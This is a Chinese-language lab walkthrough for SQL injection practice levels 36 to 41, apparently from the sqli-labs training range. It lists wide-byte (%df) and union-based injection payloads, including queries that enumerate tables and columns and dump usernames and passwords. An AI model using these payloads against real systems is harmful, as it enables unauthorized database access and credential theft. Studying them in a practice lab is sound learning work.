less36
1.我們打開靶場之后打開來看一下,輸入的內容會被轉義,依舊是寬字節注入
2.使用以下寬字節注入,使用的是%df
?id=-1%df%27%20union%20select%201,database(),3--+
3.剩余內容與前面關卡基本一樣,只要使用上面的方法合成寬字節即可
less37
1.我們打開靶場之后打開來看一下,它依舊告訴我們輸入的內容會被轉義,且有登錄框
2.我們可以看到需要進行抓包,然后就可以在數據包里面輸入以下語句,我們依舊使用%df進行轉義
?id=-1%df%27%20union%20select%201,database(),3--+
3.剩余的內容與之前一樣,做法與上面相同
less38
1.我們打開靶場之后打開來看一下
2.這一關我們可以使用聯和注入來做,語句如下
?id=-1' union select 1,2,3--+
?id=-1' union select 1,2,database()--+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1' union select 1,2,group_concat(username,password) from users--+
less39
1.我們打開靶場之后打開來看一下
2.我們可以繼續使用聯合注入來做,不過閉合方式為數字型的,語句如下
?id=-1 union select 1,2,3--+
3.方法和上面一樣,語句與上一關基本一樣
less40
1.我們打開靶場之后打開來看一下
2.這一關和上一關一樣,不過是字符型,閉合方式為‘),語句如下
?id=1')union select 1,2,3--+
3.其余內容除閉合方式外和上一關一樣
less41
1.這一關和39關一樣為數字型注入
?id=-1 union select 1,2,3--+
2.其余做法和39關一樣
)
)
)
